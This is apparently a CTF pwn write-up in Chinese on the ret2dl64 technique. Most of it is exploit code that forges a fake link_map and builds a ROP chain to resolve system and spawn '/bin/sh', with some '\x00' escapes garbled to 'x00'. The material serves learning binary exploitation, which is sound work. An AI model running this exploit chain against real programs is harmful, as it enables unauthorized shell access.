• ret2dl64


    ret2dl64

    ret2dl64 与ret2dl32不同,ret2dl64需要知道libc。

    检查保护:

    image-20200514133244568

    IDA看一看

    image-20200514133310858

    read_got 被置为0,强制你使用ret2dlresolve。

    我们先伪造link_map,然后让程序去执行我们伪造的link_map,执行system('/bin/sh')。

    首先我们需要恢复read函数的got表,方法就是布置好参数跳转到plt0重新解析read函数。

    bin_sh =  fake_link_map_addr + 0x78
    
    payload = fake_link_map
    payload = payload.ljust(0x118,'x00')
    payload += p64(pop_rdi_ret)+p64(0)+p64(pop_rsi_r15_ret)+p64(0x0600E10)+p64(0)+p64(0x400406)  #恢复read_got的内容
    payload += p64(pop_rdi_ret) + p64(bin_sh)+p64(ret)+ p64(plt_load) + p64(fake_link_map_addr) + p64(0)#通过fake_link_map调用system('/bin/sh')
    

    我们再来看看fake_link_map

    l_addr = libc.sym['system'] - libc.sym['read']
    r_offset = buf - l_addr  #保证buf为可读可写就可以了
    
    #负数需要补码
    if l_addr < 0:
     l_addr = l_addr + 0x10000000000000000
    
    
    fake_link_map_addr = buf
    fake_dyn_strtab_addr = fake_link_map_addr + 0x8
    fake_dyn_symtab_addr = fake_link_map_addr + 0x18
    fake_dyn_rel_addr = fake_link_map_addr + 0x28
    
    
    fake_link_map  = p64(l_addr)
    fake_link_map += p64(0) + p64(dynstr) #fake_dyn_strtab : fake_link_map_addr + 0x8
    fake_link_map += p64(0) + p64(read_got - 0x8) #fake_dyn_symtab : fake_link_map_addr + 0x18
    fake_link_map += p64(0) + p64(fake_link_map_addr + 0x38) #fake_dyn_rel : fake_link_map_addr + 0x28
    fake_link_map += p64(r_offset) + p64(0x7) + p64(0) #fake_rel : fake_link_map_addr + 0x38
    fake_link_map = fake_link_map.ljust(0x68,'x00')
    
    fake_link_map += p64(fake_dyn_strtab_addr)#dyn_strtab的指针
    fake_link_map += p64(fake_dyn_symtab_addr) #dyn_strsym的指针 : fake_link_map_addr + 0x70
    fake_link_map += '/bin/shx00'   #fake_link_map_addr + 0x78
    fake_link_map = fake_link_map.ljust(0xF8,'x00')
    fake_link_map += p64(fake_dyn_rel_addr)#在fake_link_map_addr + 0xF8处,是rel.plt指针
    
  • 相关阅读:
    3.for in循环
    2.break与continue
    1.XHTML框架结构
    lamda表达式在EF中的应用
    View数据呈现相关技术
    ASP.NET MVC 4 技术讲解
    ASP.NET MVC 相关的社群与讨论区
    C# 随机红包算法
    圆圈里带 小写字母,大写字母
    使用SQL语句 检测 MSSQL死锁
  • 原文地址:https://www.cnblogs.com/Rookle/p/12888150.html
Copyright © 2020-2023  润新知